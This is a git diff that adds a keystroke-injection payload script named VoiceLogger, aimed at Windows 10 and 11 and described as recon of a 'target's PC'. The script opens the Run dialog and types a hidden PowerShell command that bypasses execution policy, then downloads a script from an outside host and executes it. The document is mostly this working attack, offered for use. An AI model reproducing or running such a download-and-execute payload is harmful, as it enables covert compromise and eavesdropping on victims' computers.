diff --git a/Payloads/VoiceLogger/VoiceLogger.txt b/Payloads/VoiceLogger/VoiceLogger.txt new file mode 100644 index 0000000..2034cc9 --- /dev/null +++ b/Payloads/VoiceLogger/VoiceLogger.txt @@ -0,0 +1,12 @@ +REM Title: VoiceLogger + +REM Author: I am Jakoby + +REM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details. + +REM Target: Windows 10, 11 + +GUI r +DELAY 500 +STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/voiceLogger | iex +ENTER